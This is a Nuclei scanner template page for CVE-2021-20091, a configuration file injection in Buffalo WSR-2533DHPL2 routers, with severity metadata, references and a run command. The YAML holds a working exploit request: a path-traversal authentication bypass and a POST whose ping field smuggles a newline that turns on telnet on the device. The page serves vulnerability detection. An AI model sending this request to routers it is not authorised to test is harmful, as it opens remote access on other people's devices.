Skip to content
Nuclei Templates

Buffalo WSR-2533DHPL2 - Configuration File Injection

ID: CVE-2021-20091

Severity: high

Author: gy741,pdteam,parth

Tags: cve2021,cve,buffalo,firmware,iot,tenable

Description

Section titled “Description”

The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2021-20091


info:
  name: Buffalo WSR-2533DHPL2 - Configuration File Injection
  author: gy741,pdteam,parth
  severity: high
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.
  impact: |
    An attacker can exploit this vulnerability to inject malicious configuration settings, potentially leading to unauthorized access or control of the router.
  remediation: |
    Apply the latest firmware update provided by Buffalo to fix the configuration file injection vulnerability.
  reference:
    - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
    - https://www.tenable.com/security/research/tra-2021-13
    - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20091
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-20091
    epss-score: 0.00928
    epss-percentile: 0.8296
    cpe: cpe:2.3:h:buffalo:wsr-2533dhpl2-bk:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: buffalo
    product: wsr-2533dhpl2-bk
  tags: cve2021,cve,buffalo,firmware,iot,tenable


http:
  - raw:
      - |
        GET /images/..%2finfo.html HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
      - |
        POST /images/..%2fapply_abstract.cgi HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/info.html
        Content-Type: application/x-www-form-urlencoded


        action=start_ping&httoken={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}}&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/Success.htm"


      - type: status
        status:
          - 302


    extractors:
      - type: regex
        name: httoken
        group: 1
        regex:
          - 'base64\,(.*?)" border='
        internal: true
# digest: 490a0046304402201c5fe9bffcb3a197df034a015094e92e13015db8d58d64c364d6d0956b4d0b30022007dfab497b561b65c2d0fd3ea6bcb9b0fe298d8634e48e4aa0060aaa11c98436:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-20091.yaml"

View on Github